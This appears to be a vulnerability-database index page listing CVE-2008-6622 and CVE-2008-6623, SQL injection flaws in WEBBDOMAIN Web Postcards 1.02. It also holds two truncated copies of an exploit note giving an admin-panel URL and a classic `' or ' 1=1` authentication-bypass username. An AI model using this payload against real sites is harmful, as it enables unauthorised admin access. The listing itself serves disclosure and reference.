CVE-2008-6623

The CVE-2008-6623 entry describes an SQL injection flaw in WEBBDOMAIN Post Card (Web Postcards) 1.02 and earlier, exploitable via the username parameter in getin.php. Root cause is improper input handling leading to arbitrary SQL execution; remote attackers could potentially exploit it. The conne...

CVE-2008-6622

CVE-2008-6622 is a SQL injection vulnerability in WEBBDOMAIN Post Card (Web Postcards) 1.02, 1.01 and earlier, affecting choosecard.php. The underlying issue allows remote attackers to inject and execute arbitrary SQL commands through the catid parameter. The available references document the aff...

webbpostcart-sql.txt

-==============================- Autore: x0r - Road Crew Cms: WebbDomain Web Postcards Bug: Auth ByPass Site Of Seller: http://webbdomain.com -==============================- Exploit: http://webbdomain.com/php/postcarden/admin Username: admin ' or ' 1=1 Pass: x0r Live Demo:...

WEBBDOMAIN Post Card 1.02 - Authentication Bypass

-==============================- Autore: x0r - Road Crew Cms: WebbDomain Web Postcards Bug: Auth ByPass Site Of Seller: http://webbdomain.com -==============================- Exploit: http://webbdomain.com/php/postcarden/admin Username: admin ' or ' 1=1 Pass: x0r Live Demo:...